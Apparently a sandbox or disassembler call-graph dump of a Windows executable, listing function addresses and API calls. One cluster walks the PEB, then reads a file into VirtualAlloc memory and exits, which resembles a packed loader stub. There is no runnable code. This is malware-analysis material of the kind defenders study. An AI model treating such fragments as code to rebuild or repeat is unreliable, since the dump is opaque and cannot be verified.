a219c 97570->97571 97571->97550 97573 5e684 ___scrt_is_nonwritable_in_current_image 97572->97573 97574 5e695 97573->97574 97575 5e6aa 97573->97575 97603 5f2d9 20 API calls _abort 97574->97603 97584 5e6a5 __wsopen_s 97575->97584 97586 5918d EnterCriticalSection 97575->97586 97577 5e69a 97604 627ec 26 API calls __wsopen_s 97577->97604 97580 5e6c6 97587 5e602 97580->97587 97582 5e6d1 97605 5e6ee LeaveCriticalSection __fread_nolock 97582->97605 97584->97563 97585->97560 97586->97580 97588 5e624 97587->97588 97589 5e60f 97587->97589 97595 5e61f 97588->97595 97606 5dc0b 97588->97606 97638 5f2d9 20 API calls _abort 97589->97638 97591 5e614 97639 627ec 26 API calls __wsopen_s 97591->97639 97595->97582 97599 5e646 97623 6862f 97599->97623 97602 629c8 _free 20 API calls 97602->97595 97603->97577 97604->97584 97605->97584 97607 5dc1f 97606->97607 97608 5dc23 97606->97608 97612 64d7a 97607->97612 97608->97607 97609 5d955 __fread_nolock 26 API calls 97608->97609 97610 5dc43 97609->97610 97640 659be 62 API calls 3 library calls 97610->97640 97613 5e640 97612->97613 97614 64d90 97612->97614 97616 5d955 97613->97616 97614->97613 97615 629c8 _free 20 API calls 97614->97615 97615->97613 97617 5d976 97616->97617 97618 5d961 97616->97618 97617->97599 97641 5f2d9 20 API calls _abort 97618->97641 97620 5d966 97642 627ec 26 API calls __wsopen_s 97620->97642 97622 5d971 97622->97599 97624 68653 97623->97624 97625 6863e 97623->97625 97627 6868e 97624->97627 97632 6867a 97624->97632 97646 5f2c6 20 API calls _abort 97625->97646 97648 5f2c6 20 API calls _abort 97627->97648 97629 68643 97647 5f2d9 20 API calls _abort 97629->97647 97630 68693 97649 5f2d9 20 API calls _abort 97630->97649 97643 68607 97632->97643 97635 6869b 97650 627ec 26 API calls __wsopen_s 97635->97650 97636 5e64c 97636->97595 97636->97602 97638->97591 97639->97595 97640->97607 97641->97620 97642->97622 97651 68585 97643->97651 97645 6862b 97645->97636 97646->97629 97647->97636 97648->97630 97649->97635 97650->97636 97652 68591 ___scrt_is_nonwritable_in_current_image 97651->97652 97662 65147 EnterCriticalSection 97652->97662 97654 6859f 97655 685c6 97654->97655 97656 685d1 97654->97656 97663 686ae 97655->97663 97678 5f2d9 20 API calls _abort 97656->97678 97659 685cc 97679 685fb LeaveCriticalSection __wsopen_s 97659->97679 97661 685ee __wsopen_s 97661->97645 97662->97654 97680 653c4 97663->97680 97665 686c4 97693 65333 21 API calls 2 library calls 97665->97693 97666 686be 97666->97665 97668 686f6 97666->97668 97670 653c4 __wsopen_s 26 API calls 97666->97670 97668->97665 97671 653c4 __wsopen_s 26 API calls 97668->97671 97669 6871c 97672 6873e 97669->97672 97694 5f2a3 20 API calls __dosmaperr 97669->97694 97673 686ed 97670->97673 97674 68702 CloseHandle 97671->97674 97672->97659 97677 653c4 __wsopen_s 26 API calls 97673->97677 97674->97665 97675 6870e GetLastError 97674->97675 97675->97665 97677->97668 97678->97659 97679->97661 97681 653e6 97680->97681 97682 653d1 97680->97682 97685 5f2c6 __dosmaperr 20 API calls 97681->97685 97687 6540b 97681->97687 97683 5f2c6 __dosmaperr 20 API calls 97682->97683 97684 653d6 97683->97684 97686 5f2d9 __dosmaperr 20 API calls 97684->97686 97688 65416 97685->97688 97689 653de 97686->97689 97687->97666 97690 5f2d9 __dosmaperr 20 API calls 97688->97690 97689->97666 97691 6541e 97690->97691 97692 627ec __wsopen_s 26 API calls 97691->97692 97692->97689 97693->97669 97694->97672 97695->97197 97696 72ba5 97697 32b25 97696->97697 97698 72baf 97696->97698 97724 32b83 7 API calls 97697->97724 97739 33a5a 97698->97739 97701 72bb8 97746 39cb3 97701->97746 97705 32b2f 97714 32b44 97705->97714 97728 33837 97705->97728 97706 72bc6 97707 72bf5 97706->97707 97708 72bce 97706->97708 97711 333c6 22 API calls 97707->97711 97752 333c6 97708->97752 97723 72bf1 GetForegroundWindow ShellExecuteW 97711->97723 97715 32b5f 97714->97715 97738 330f2 Shell_NotifyIconW ___scrt_fastfail 97714->97738 97720 32b66 SetCurrentDirectoryW 97715->97720 97719 72c26 97719->97715 97722 32b7a 97720->97722 97721 333c6 22 API calls 97721->97723 97723->97719 97770 32cd4 7 API calls 97724->97770 97726 32b2a 97727 32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97726->97727 97727->97705 97729 33862 ___scrt_fastfail 97728->97729 97771 34212 97729->97771 97732 338e8 97734 73386 Shell_NotifyIconW 97732->97734 97735 33906 Shell_NotifyIconW 97732->97735 97775 33923 97735->97775 97737 3391c 97737->97714 97738->97715 97740 71f50 __wsopen_s 97739->97740 97741 33a67 GetModuleFileNameW 97740->97741 97742 39cb3 22 API calls 97741->97742 97743 33a8d 97742->97743 97744 33aa2 23 API calls 97743->97744 97745 33a97 97744->97745 97745->97701 97747 39cc2 _wcslen 97746->97747 97748 4fe0b 22 API calls 97747->97748 97749 39cea __fread_nolock 97748->97749 97750 4fddb 22 API calls 97749->97750 97751 39d00 97750->97751 97751->97706 97753 730bb 97752->97753 97754 333dd 97752->97754 97756 4fddb 22 API calls 97753->97756 97804 333ee 97754->97804 97758 730c5 _wcslen 97756->97758 97757 333e8 97761 36350 97757->97761 97759 4fe0b 22 API calls 97758->97759 97760 730fe __fread_nolock 97759->97760 97762 36362 97761->97762 97763 74a51 97761->97763 97819 36373 97762->97819 97829 34a88 22 API calls __fread_nolock 97763->97829 97766 3636e 97766->97721 97767 74a5b 97768 74a67 97767->97768 97830 3a8c7 22 API calls __fread_nolock 97767->97830 97770->97726 97772 735a4 97771->97772 97773 338b7 97771->97773 97772->97773 97774 735ad DestroyIcon 97772->97774 97773->97732 97797 9c874 42 API calls _strftime 97773->97797 97774->97773 97776 33a13 97775->97776 97777 3393f 97775->97777 97776->97737 97798 36270 97777->97798 97780 73393 LoadStringW 97783 733ad 97780->97783 97781 3395a 97782 36b57 22 API calls 97781->97782 97784 3396f 97782->97784 97791 33994 ___scrt_fastfail 97783->97791 97803 3a8c7 22 API calls __fread_nolock 97783->97803 97785 733c9 97784->97785 97786 3397c 97784->97786 97789 36350 22 API calls 97785->97789 97786->97783 97788 33986 97786->97788 97790 36350 22 API calls 97788->97790 97792 733d7 97789->97792 97790->97791 97794 339f9 Shell_NotifyIconW 97791->97794 97792->97791 97793 333c6 22 API calls 97792->97793 97795 733f9 97793->97795 97794->97776 97796 333c6 22 API calls 97795->97796 97796->97791 97797->97732 97799 4fe0b 22 API calls 97798->97799 97800 36295 97799->97800 97801 4fddb 22 API calls 97800->97801 97802 3394d 97801->97802 97802->97780 97802->97781 97803->97791 97805 333fe _wcslen 97804->97805 97806 33411 97805->97806 97807 7311d 97805->97807 97814 3a587 97806->97814 97809 4fddb 22 API calls 97807->97809 97811 73127 97809->97811 97810 3341e __fread_nolock 97810->97757 97812 4fe0b 22 API calls 97811->97812 97813 73157 __fread_nolock 97812->97813 97816 3a59d 97814->97816 97818 3a598 __fread_nolock 97814->97818 97815 7f80f 97816->97815 97817 4fe0b 22 API calls 97816->97817 97817->97818 97818->97810 97821 36382 97819->97821 97825 363b6 __fread_nolock 97819->97825 97820 74a82 97824 4fddb 22 API calls 97820->97824 97821->97820 97822 363a9 97821->97822 97821->97825 97823 3a587 22 API calls 97822->97823 97823->97825 97826 74a91 97824->97826 97825->97766 97827 4fe0b 22 API calls 97826->97827 97828 74ac5 __fread_nolock 97827->97828 97829->97767 97830->97768 97831 68402 97836 681be 97831->97836 97834 6842a 97837 681ef try_get_first_available_module 97836->97837 97844 68338 97837->97844 97851 58e0b 40 API calls 2 library calls 97837->97851 97839 683ee 97855 627ec 26 API calls __wsopen_s 97839->97855 97841 68343 97841->97834 97848 70984 97841->97848 97843 6838c 97843->97844 97852 58e0b 40 API calls 2 library calls 97843->97852 97844->97841 97854 5f2d9 20 API calls _abort 97844->97854 97846 683ab 97846->97844 97853 58e0b 40 API calls 2 library calls 97846->97853 97856 70081 97848->97856 97850 7099f 97850->97834 97851->97843 97852->97846 97853->97844 97854->97839 97855->97841 97859 7008d ___scrt_is_nonwritable_in_current_image 97856->97859 97857 7009b 97914 5f2d9 20 API calls _abort 97857->97914 97859->97857 97861 700d4 97859->97861 97860 700a0 97915 627ec 26 API calls __wsopen_s 97860->97915 97867 7065b 97861->97867 97866 700aa __wsopen_s 97866->97850 97917 7042f 97867->97917 97870 706a6 97935 65221 97870->97935 97871 7068d 97949 5f2c6 20 API calls _abort 97871->97949 97874 706ab 97875 706b4 97874->97875 97876 706cb 97874->97876 97951 5f2c6 20 API calls _abort 97875->97951 97948 7039a CreateFileW 97876->97948 97880 706b9 97952 5f2d9 20 API calls _abort 97880->97952 97882 70781 GetFileType 97883 7078c GetLastError 97882->97883 97887 707d3 97882->97887 97955 5f2a3 20 API calls __dosmaperr 97883->97955 97884 70756 GetLastError 97954 5f2a3 20 API calls __dosmaperr 97884->97954 97885 70704 97885->97882 97885->97884 97953 7039a CreateFileW 97885->97953 97957 6516a 21 API calls 2 library calls 97887->97957 97889 7079a CloseHandle 97891 70692 97889->97891 97892 707c3 97889->97892 97950 5f2d9 20 API calls _abort 97891->97950 97956 5f2d9 20 API calls _abort 97892->97956 97894 70749 97894->97882 97894->97884 97896 707f4 97898 70840 97896->97898 97958 705ab 72 API calls 3 library calls 97896->97958 97897 707c8 97897->97891 97902 7086d 97898->97902 97959 7014d 72 API calls 4 library calls 97898->97959 97901 70866 97901->97902 97903 7087e 97901->97903 97904 686ae __wsopen_s 29 API calls 97902->97904 97905 700f8 97903->97905 97906 708fc CloseHandle 97903->97906 97904->97905 97916 70121 LeaveCriticalSection __wsopen_s 97905->97916 97960 7039a CreateFileW 97906->97960 97908 70927 97909 7095d 97908->97909 97910 70931 GetLastError 97908->97910 97909->97905 97961 5f2a3 20 API calls __dosmaperr 97910->97961 97912 7093d 97962 65333 21 API calls 2 library calls 97912->97962 97914->97860 97915->97866 97916->97866 97918 70450 97917->97918 97919 7046a 97917->97919 97918->97919 97970 5f2d9 20 API calls _abort 97918->97970 97963 703bf 97919->97963 97922 7045f 97971 627ec 26 API calls __wsopen_s 97922->97971 97924 704a2 97925 704d1 97924->97925 97972 5f2d9 20 API calls _abort 97924->97972 97933 70524 97925->97933 97974 5d70d 26 API calls 2 library calls 97925->97974 97928 7051f 97930 7059e 97928->97930 97928->97933 97929 704c6 97973 627ec 26 API calls __wsopen_s 97929->97973 97975 627fc 11 API calls _abort 97930->97975 97933->97870 97933->97871 97934 705aa 97936 6522d ___scrt_is_nonwritable_in_current_image 97935->97936 97978 62f5e EnterCriticalSection 97936->97978 97938 6527b 97979 6532a 97938->97979 97939 65234 97939->97938 97940 65259 97939->97940 97945 652c7 EnterCriticalSection 97939->97945 97982 65000 97940->97982 97943 652a4 __wsopen_s 97943->97874 97945->97938 97946 652d4 LeaveCriticalSection 97945->97946 97946->97939 97948->97885 97949->97891 97950->97905 97951->97880 97952->97891 97953->97894 97954->97891 97955->97889 97956->97897 97957->97896 97958->97898 97959->97901 97960->97908 97961->97912 97962->97909 97965 703d7 97963->97965 97964 703f2 97964->97924 97965->97964 97976 5f2d9 20 API calls _abort 97965->97976 97967 70416 97977 627ec 26 API calls __wsopen_s 97967->97977 97969 70421 97969->97924 97970->97922 97971->97919 97972->97929 97973->97925 97974->97928 97975->97934 97976->97967 97977->97969 97978->97939 97990 62fa6 LeaveCriticalSection 97979->97990 97981 65331 97981->97943 97983 64c7d _abort 20 API calls 97982->97983 97985 65012 97983->97985 97984 6501f 97986 629c8 _free 20 API calls 97984->97986 97985->97984 97991 63405 11 API calls 2 library calls 97985->97991 97987 65071 97986->97987 97987->97938 97989 65147 EnterCriticalSection 97987->97989 97989->97938 97990->97981 97991->97985 97992 3dee5 97995 3b710 97992->97995 97996 3b72b 97995->97996 97997 800f8 97996->97997 97998 80146 97996->97998 98024 3b750 97996->98024 98001 80102 97997->98001 98004 8010f 97997->98004 97997->98024 98061 b58a2 207 API calls 2 library calls 97998->98061 98059 b5d33 207 API calls 98001->98059 98020 3ba20 98004->98020 98060 b61d0 207 API calls 2 library calls 98004->98060 98007 803d9 98007->98007 98009 3bbe0 40 API calls 98009->98024 98012 80322 98065 b5c0c 82 API calls 98012->98065 98016 3ba4e 98020->98016 98066 a359c 82 API calls __wsopen_s 98020->98066 98021 4d336 40 API calls 98021->98024 98024->98009 98024->98012 98024->98016 98024->98020 98024->98021 98026 3ec40 98024->98026 98050 3a81b 41 API calls 98024->98050 98051 4d2f0 40 API calls 98024->98051 98052 4a01b 207 API calls 98024->98052 98053 50242 5 API calls __Init_thread_wait 98024->98053 98054 4edcd 22 API calls 98024->98054 98055 500a3 29 API calls __onexit 98024->98055 98056 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98024->98056 98057 4ee53 82 API calls 98024->98057 98058 4e5ca 207 API calls 98024->98058 98062 3aceb 23 API calls ISource 98024->98062 98063 8f6bf 23 API calls 98024->98063 98064 3a8c7 22 API calls __fread_nolock 98024->98064 98047 3ec76 ISource 98026->98047 98027 4fddb 22 API calls 98027->98047 98029 3fef7 98042 3ed9d ISource 98029->98042 98070 3a8c7 22 API calls __fread_nolock 98029->98070 98031 84600 98031->98042 98069 3a8c7 22 API calls __fread_nolock 98031->98069 98032 84b0b 98072 a359c 82 API calls __wsopen_s 98032->98072 98038 3a8c7 22 API calls 98038->98047 98039 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98039->98047 98040 3fbe3 98040->98042 98043 84bdc 98040->98043 98049 3f3ae ISource 98040->98049 98041 3a961 22 API calls 98041->98047 98042->98024 98073 a359c 82 API calls __wsopen_s 98043->98073 98044 500a3 29 API calls pre_c_initialization 98044->98047 98046 84beb 98074 a359c 82 API calls __wsopen_s 98046->98074 98047->98027 98047->98029 98047->98031 98047->98032 98047->98038 98047->98039 98047->98040 98047->98041 98047->98042 98047->98044 98047->98046 98048 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98047->98048 98047->98049 98067 401e0 207 API calls 2 library calls 98047->98067 98068 406a0 41 API calls ISource 98047->98068 98048->98047 98049->98042 98071 a359c 82 API calls __wsopen_s 98049->98071 98050->98024 98051->98024 98052->98024 98053->98024 98054->98024 98055->98024 98056->98024 98057->98024 98058->98024 98059->98004 98060->98020 98061->98024 98062->98024 98063->98024 98064->98024 98065->98020 98066->98007 98067->98047 98068->98047 98069->98042 98070->98042 98071->98042 98072->98042 98073->98046 98074->98042 98075 31044 98080 310f3 98075->98080 98077 3104a 98116 500a3 29 API calls __onexit 98077->98116 98079 31054 98117 31398 98080->98117 98084 3116a 98085 3a961 22 API calls 98084->98085 98086 31174 98085->98086 98087 3a961 22 API calls 98086->98087 98088 3117e 98087->98088 98089 3a961 22 API calls 98088->98089 98090 31188 98089->98090 98091 3a961 22 API calls 98090->98091 98092 311c6 98091->98092 98093 3a961 22 API calls 98092->98093 98094 31292 98093->98094 98127 3171c 98094->98127 98098 312c4 98099 3a961 22 API calls 98098->98099 98100 312ce 98099->98100 98148 41940 98100->98148 98102 312f9 98158 31aab 98102->98158 98104 31315 98105 31325 GetStdHandle 98104->98105 98106 72485 98105->98106 98107 3137a 98105->98107 98106->98107 98108 7248e 98106->98108 98110 31387 OleInitialize 98107->98110 98109 4fddb 22 API calls 98108->98109 98111 72495 98109->98111 98110->98077 98165 a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98111->98165 98113 7249e 98166 a0944 CreateThread 98113->98166 98115 724aa CloseHandle 98115->98107 98116->98079 98167 313f1 98117->98167 98120 313f1 22 API calls 98121 313d0 98120->98121 98122 3a961 22 API calls 98121->98122 98123 313dc 98122->98123 98124 36b57 22 API calls 98123->98124 98125 31129 98124->98125 98126 31bc3 6 API calls 98125->98126 98126->98084 98128 3a961 22 API calls 98127->98128 98129 3172c 98128->98129 98130 3a961 22 API calls 98129->98130 98131 31734 98130->98131 98132 3a961 22 API calls 98131->98132 98133 3174f 98132->98133 98134 4fddb 22 API calls 98133->98134 98135 3129c 98134->98135 98136 31b4a 98135->98136 98137 31b58 98136->98137 98138 3a961 22 API calls 98137->98138 98139 31b63 98138->98139 98140 3a961 22 API calls 98139->98140 98141 31b6e 98140->98141 98142 3a961 22 API calls 98141->98142 98143 31b79 98142->98143 98144 3a961 22 API calls 98143->98144 98145 31b84 98144->98145 98146 4fddb 22 API calls 98145->98146 98147 31b96 RegisterWindowMessageW 98146->98147 98147->98098 98149 41981 98148->98149 98150 4195d 98148->98150 98174 50242 5 API calls __Init_thread_wait 98149->98174 98157 4196e 98150->98157 98176 50242 5 API calls __Init_thread_wait 98150->98176 98152 4198b 98152->98150 98175 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98152->98175 98154 48727 98154->98157 98177 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98154->98177 98157->98102 98159 31abb 98158->98159 98160 7272d 98158->98160 98162 4fddb 22 API calls 98159->98162 98178 a3209 23 API calls 98160->98178 98164 31ac3 98162->98164 98163 72738 98164->98104 98165->98113 98166->98115 98179 a092a 28 API calls 98166->98179 98168 3a961 22 API calls 98167->98168 98169 313fc 98168->98169 98170 3a961 22 API calls 98169->98170 98171 31404 98170->98171 98172 3a961 22 API calls 98171->98172 98173 313c6 98172->98173 98173->98120 98174->98152 98175->98150 98176->98154 98177->98157 98178->98163 98180 117acf0 98194 1178940 98180->98194 98182 117adae 98197 117abe0 98182->98197 98184 117add7 CreateFileW 98186 117ae26 98184->98186 98187 117ae2b 98184->98187 98187->98186 98188 117ae42 VirtualAlloc 98187->98188 98188->98186 98189 117ae60 ReadFile 98188->98189 98189->98186 98190 117ae7b 98189->98190 98191 1179be0 13 API calls 98190->98191 98192 117aeae 98191->98192 98193 117aed1 ExitProcess 98192->98193 98193->98186 98200 117bde0 GetPEB 98194->98200 98196 1178fcb 98196->98182 98198 117abe9 Sleep 98197->98198 98199 117abf7 98198->98199 98201 117be0a 98200->98201 98201->98196 98202 82a00 98216 3d7b0 ISource 98202->98216 98203 3db11 PeekMessageW 98203->98216 98204 3d807 GetInputState 98204->98203 98204->98216 98205 81cbe TranslateAcceleratorW 98205->98216 98207 3db73 TranslateMessage DispatchMessageW 98208 3db8f PeekMessageW 98207->98208 98208->98216 98209 3da04 timeGetTime 98209->98216 98210 3dbaf Sleep 98228 3dbc0 98210->98228 98211 82b74 Sleep 98211->98228 98212 81dda timeGetTime 98322 4e300 23 API calls 98212->98322 98213 4e551 timeGetTime 98213->98228 98216->98203 98216->98204 98216->98205 98216->98207 98216->98208 98216->98209 98216->98210 98216->98211 98216->98212 98219 3d9d5 98216->98219 98230 3ec40 207 API calls 98216->98230 98234 3dd50 98216->98234 98241 3dfd0 98216->98241 98264 41310 98216->98264 98320 3bf40 207 API calls 2 library calls 98216->98320 98321 4edf6 IsDialogMessageW GetClassLongW 98216->98321 98323 a3a2a 23 API calls 98216->98323 98324 a359c 82 API calls __wsopen_s 98216->98324 98217 82c0b GetExitCodeProcess 98220 82c21 WaitForSingleObject 98217->98220 98221 82c37 CloseHandle 98217->98221 98220->98216 98220->98221 98221->98228 98222 82a31 98222->98219 98223 c29bf GetForegroundWindow 98223->98228 98224 82ca9 Sleep 98224->98216 98228->98213 98228->98216 98228->98217 98228->98219 98228->98222 98228->98223 98228->98224 98325 b5658 23 API calls 98228->98325 98326 9e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98228->98326 98327 9d4dc 47 API calls 98228->98327 98230->98216 98235 3dd83 98234->98235 98236 3dd6f 98234->98236 98329 a359c 82 API calls __wsopen_s 98235->98329 98328 3d260 207 API calls 2 library calls 98236->98328 98238 3dd7a 98238->98216 98240 82f75 98240->98240 98242 3e010 98241->98242 98259 3e0dc ISource 98242->98259 98333 50242 5 API calls __Init_thread_wait 98242->98333 98243 3ec40 207 API calls 98243->98259 98246 82fca 98248 3a961 22 API calls 98246->98248 98246->98259 98247 3a961 22 API calls 98247->98259 98251 82fe4 98248->98251 98334 500a3 29 API calls __onexit 98251->98334 98254 a359c 82 API calls 98254->98259 98255 82fee 98335 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98255->98335 98259->98243 98259->98247 98259->98254 98260 3e3e1 98259->98260 98261 404f0 22 API calls 98259->98261 98330 3a8c7 22 API calls __fread_nolock 98259->98330 98331 3a81b 41 API calls 98259->98331 98332 4a308 207 API calls 98259->98332 98336 50242 5 API calls __Init_thread_wait 98259->98336 98337 500a3 29 API calls __onexit 98259->98337 98338 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98259->98338 98339 b47d4 207 API calls 98259->98339 98340 b68c1 207 API calls 98259->98340 98260->98216 98261->98259 98265 41376 98264->98265 98266 417b0 98264->98266 98267 86331 98265->98267 98270 41940 9 API calls 98265->98270 98462 50242 5 API calls __Init_thread_wait 98266->98462 98421 b709c 98267->98421 98274 413a0 98270->98274 98271 417ba 98272 417fb 98271->98272 98275 39cb3 22 API calls 98271->98275 98278 86346 98272->98278 98280 4182c 98272->98280 98273 8633d 98273->98216 98276 41940 9 API calls 98274->98276 98283 417d4 98275->98283 98277 413b6 98276->98277 98277->98272 98279 413ec 98277->98279 98467 a359c 82 API calls __wsopen_s 98278->98467 98279->98278 98303 41408 __fread_nolock 98279->98303 98464 3aceb 23 API calls ISource 98280->98464 98463 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98283->98463 98284 41839 98465 4d217 207 API calls 98284->98465 98287 8636e 98308 86369 98287->98308 98468 a359c 82 API calls __wsopen_s 98287->98468 98288 4152f 98290 4153c 98288->98290 98291 863d1 98288->98291 98293 41940 9 API calls 98290->98293 98470 b5745 54 API calls _wcslen 98291->98470 98294 41549 98293->98294 98298 864fa 98294->98298 98300 41940 9 API calls 98294->98300 98295 4fddb 22 API calls 98295->98303 98296 41872 98296->98267 98466 4faeb 23 API calls 98296->98466 98297 4fe0b 22 API calls 98297->98303 98298->98308 98472 a359c 82 API calls __wsopen_s 98298->98472 98304 41563 98300->98304 98302 3ec40 207 API calls 98302->98303 98303->98284 98303->98287 98303->98288 98303->98295 98303->98297 98303->98302 98305 863b2 98303->98305 98303->98308 98304->98298 98310 415c7 ISource 98304->98310 98471 3a8c7 22 API calls __fread_nolock 98304->98471 98469 a359c 82 API calls __wsopen_s 98305->98469 98308->98216 98309 41940 9 API calls 98309->98310 98310->98296 98310->98298 98310->98308 98310->98309 98311 4167b ISource 98310->98311 98341 a83da 98310->98341 98344 a744a 98310->98344 98400 af0ec 98310->98400 98409 36246 98310->98409 98413 b958b 98310->98413 98416 36216 98310->98416 98312 4171d 98311->98312 98461 4ce17 22 API calls ISource 98311->98461 98312->98216 98320->98216 98321->98216 98322->98216 98323->98216 98324->98216 98325->98228 98326->98228 98327->98228 98328->98238 98329->98240 98330->98259 98331->98259 98332->98259 98333->98246 98334->98255 98335->98259 98336->98259 98337->98259 98338->98259 98339->98259 98340->98259 98473 a98e3 98341->98473 98343 a83ea 98343->98310 98345 a7474 98344->98345 98346 a7469 98344->98346 98350 3a961 22 API calls 98345->98350 98383 a7554 98345->98383 98576 3b567 39 API calls 98346->98576 98348 4fddb 22 API calls 98349 a7587 98348->98349 98351 4fe0b 22 API calls 98349->98351 98352 a7495 98350->98352 98353 a7598 98351->98353 98354 3a961 22 API calls 98352->98354 98355 36246 CloseHandle 98353->98355 98356 a749e 98354->98356 98357 a75a3 98355->98357 98358 37510 53 API calls 98356->98358 98360 3a961 22 API calls 98357->98360 98359 a74aa 98358->98359 98577 3525f 22 API calls 98359->98577 98362 a75ab 98360->98362 98364 36246 CloseHandle 98362->98364 98363 a74bf 98365 36350 22 API calls 98363->98365 98366 a75b2 98364->98366 98367 a74f2 98365->98367 98368 37510 53 API calls 98366->98368 98369 a754a 98367->98369 98578 9d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 98367->98578 98370 a75be 98368->98370 98580 3b567 39 API calls 98369->98580 98372 36246 CloseHandle 98370->98372 98375 a75c8 98372->98375 98374 a7502 98374->98369 98376 a7506 98374->98376 98378 35745 5 API calls 98375->98378 98377 39cb3 22 API calls 98376->98377 98380 a7513 98377->98380 98379 a75e2 98378->98379 98381 a75ea 98379->98381 98382 a76de GetLastError 98379->98382 98579 9d2c1 26 API calls 98380->98579 98581 353de 27 API calls ISource 98381->98581 98385 a76f7 98382->98385 98383->98348 98398 a76a4 98383->98398 98387 36216 CloseHandle 98385->98387 98387->98398 98388 a75f8 98582 353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98388->98582 98389 a751c 98389->98369 98391 a7645 98392 4fddb 22 API calls 98391->98392 98394 a7679 98392->98394 98393 a75ff 98393->98391 98395 9ccff 4 API calls 98393->98395 98396 3a961 22 API calls 98394->98396 98395->98391 98397 a7686 98396->98397 98397->98398 98583 9417d 22 API calls __fread_nolock 98397->98583 98398->98310 98401 37510 53 API calls 98400->98401 98402 af126 98401->98402 98584 39e90 98402->98584 98404 af136 98405 af15b 98404->98405 98406 3ec40 207 API calls 98404->98406 98408 af15f 98405->98408 98612 39c6e 22 API calls 98405->98612 98406->98405 98408->98310 98410 36250 98409->98410 98411 3625f 98409->98411 98410->98310 98411->98410 98412 36264 CloseHandle 98411->98412 98412->98410 98620 b7f59 98413->98620 98415 b959b 98415->98310 98417 36246 CloseHandle 98416->98417 98418 3621e 98417->98418 98419 36246 CloseHandle 98418->98419 98420 3622d ISource 98419->98420 98420->98310 98422 b70db 98421->98422 98423 b70f5 98421->98423 98724 a359c 82 API calls __wsopen_s 98422->98724 98713 b5689 98423->98713 98427 3ec40 206 API calls 98428 b7164 98427->98428 98429 b71ff 98428->98429 98433 b71a6 98428->98433 98454 b70ed 98428->98454 98430 b7253 98429->98430 98431 b7205 98429->98431 98432 37510 53 API calls 98430->98432 98430->98454 98725 a1119 22 API calls 98431->98725 98434 b7265 98432->98434 98438 a0acc 22 API calls 98433->98438 98436 3aec9 22 API calls 98434->98436 98439 b7289 CharUpperBuffW 98436->98439 98437 b7228 98726 3a673 22 API calls 98437->98726 98441 b71de 98438->98441 98444 b72a3 98439->98444 98443 41310 206 API calls 98441->98443 98442 b7230 98727 3bf40 207 API calls 2 library calls 98442->98727 98443->98454 98445 b72aa 98444->98445 98446 b72f6 98444->98446 98720 a0acc 98445->98720 98447 37510 53 API calls 98446->98447 98449 b72fe 98447->98449 98728 4e300 23 API calls 98449->98728 98453 41310 206 API calls 98453->98454 98454->98273 98455 b7308 98455->98454 98456 37510 53 API calls 98455->98456 98457 b7323 98456->98457 98729 3a673 22 API calls 98457->98729 98459 b7333 98730 3bf40 207 API calls 2 library calls 98459->98730 98461->98311 98462->98271 98463->98272 98464->98284 98465->98296 98466->98296 98467->98308 98468->98308 98469->98308 98470->98304 98471->98310 98472->98308 98474 a99e8 98473->98474 98475 a9902 98473->98475 98565 a9caa 39 API calls 98474->98565 98477 4fddb 22 API calls 98475->98477 98478 a9909 98477->98478 98480 4fe0b 22 API calls 98478->98480 98479 a99ca 98479->98343 98481 a991a 98480->98481 98482 36246 CloseHandle 98481->98482 98484 a9925 98482->98484 98483 a9ac5 98524 a1e96 98483->98524 98486 3a961 22 API calls 98484->98486 98489 a992d 98486->98489 98487 a9acc 98528 9ccff 98487->98528 98488 a99a2 98488->98479 98488->98483 98490 a9a33 98488->98490 98491 36246 CloseHandle 98489->98491 98492 37510 53 API calls 98490->98492 98493 a9934 98491->98493 98497 a9a3a 98492->98497 98532 37510 98493->98532 98496 a9abb 98568 9cd57 30 API calls 98496->98568 98497->98496 98515 a9a6e 98497->98515 98500 36270 22 API calls 98503 a9a7e 98500->98503 98501 36246 CloseHandle 98504 a994a 98501->98504 98502 36246 CloseHandle 98505 a9b1e 98502->98505 98506 a9a8e 98503->98506 98566 3a8c7 22 API calls __fread_nolock 98503->98566 98555 35745 98504->98555 98508 36216 CloseHandle 98505->98508 98511 333c6 22 API calls 98506->98511 98508->98479 98514 a9a9c 98511->98514 98512 a995d 98563 353de 27 API calls ISource 98512->98563 98513 a99c2 98516 36216 CloseHandle 98513->98516 98567 9cd57 30 API calls 98514->98567 98515->98500 98516->98479 98518 a9aa8 98518->98479 98518->98502 98520 a996b 98564 353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98520->98564 98522 a9972 98522->98488 98523 9ccff 4 API calls 98522->98523 98523->98488 98525 a1e9f 98524->98525 98526 a1ea4 98524->98526 98569 a0f67 24 API calls __fread_nolock 98525->98569 98526->98487 98529 9cd19 WriteFile 98528->98529 98530 9cd0e 98528->98530 98529->98518 98570 9cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98530->98570 98533 37525 98532->98533 98549 37522 98532->98549 98534 3755b 98533->98534 98535 3752d 98533->98535 98538 3756d 98534->98538 98544 7500f 98534->98544 98545 750f6 98534->98545 98571 551c6 26 API calls 98535->98571 98572 4fb21 51 API calls 98538->98572 98539 3753d 98543 4fddb 22 API calls 98539->98543 98540 7510e 98540->98540 98546 37547 98543->98546 98548 4fe0b 22 API calls 98544->98548 98554 75088 98544->98554 98574 55183 26 API calls 98545->98574 98547 39cb3 22 API calls 98546->98547 98547->98549 98550 75058 98548->98550 98549->98501 98551 4fddb 22 API calls 98550->98551 98552 7507f 98551->98552 98553 39cb3 22 API calls 98552->98553 98553->98554 98573 4fb21 51 API calls 98554->98573 98556 74035 98555->98556 98557 3575c CreateFileW 98555->98557 98558 3577b 98556->98558 98559 7403b CreateFileW 98556->98559 98557->98558 98558->98512 98558->98513 98559->98558 98560 74063 98559->98560 98575 354c6 SetFilePointerEx SetFilePointerEx 